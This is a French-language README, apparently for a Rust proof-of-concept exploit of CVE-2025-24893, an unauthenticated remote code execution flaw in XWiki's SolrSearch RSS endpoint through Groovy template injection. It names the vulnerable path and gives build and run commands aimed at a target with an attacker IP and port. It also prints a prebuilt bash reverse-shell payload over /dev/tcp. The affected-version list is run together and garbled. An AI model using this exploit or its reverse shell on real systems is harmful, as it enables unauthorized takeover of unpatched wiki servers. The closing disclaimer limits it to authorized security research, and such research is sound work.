
Exploit de preuve de concept pour CVE-2025-24893, une vulnérabilité d'exécution de code à distance non authentifiée dans XWiki. Exploite une faille d'injection de template dans le point de terminaison SolrSearch via l'exécution de scripts Groovy.
Exploit de preuve de concept pour CVE-2025-24893, une vulnérabilité critique non authentifiée d'exécution de code à distance (RCE) dans XWiki.
Cet exploit abuse d'une injection de template Groovy dans le point de terminaison SolrSearch pour exécuter des commandes arbitraires — y compris des shells inversés — sans authentification.
Une faille dans la façon dont XWiki traite une entrée malveillante destinée au point de terminaison RSS SolrSearch permet aux attaquants d'injecter du code Groovy dans le pipeline de rendu.
Cela permet une RCE non authentifiée via des blocs de script {{groovy}}.
< 15.10.11>= 16.0.0 et < 16.4.115.10.1116.4.1Téléchargez la release :
ou compilez depuis les sources :
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
Il existe une charge utile de shell inversé préconstruite sous cette forme :
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Ce code est destiné uniquement à la recherche en sécurité éducative et autorisée.
N'utilisez pas cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.
/bin/get/Main/SolrSearch?media=rss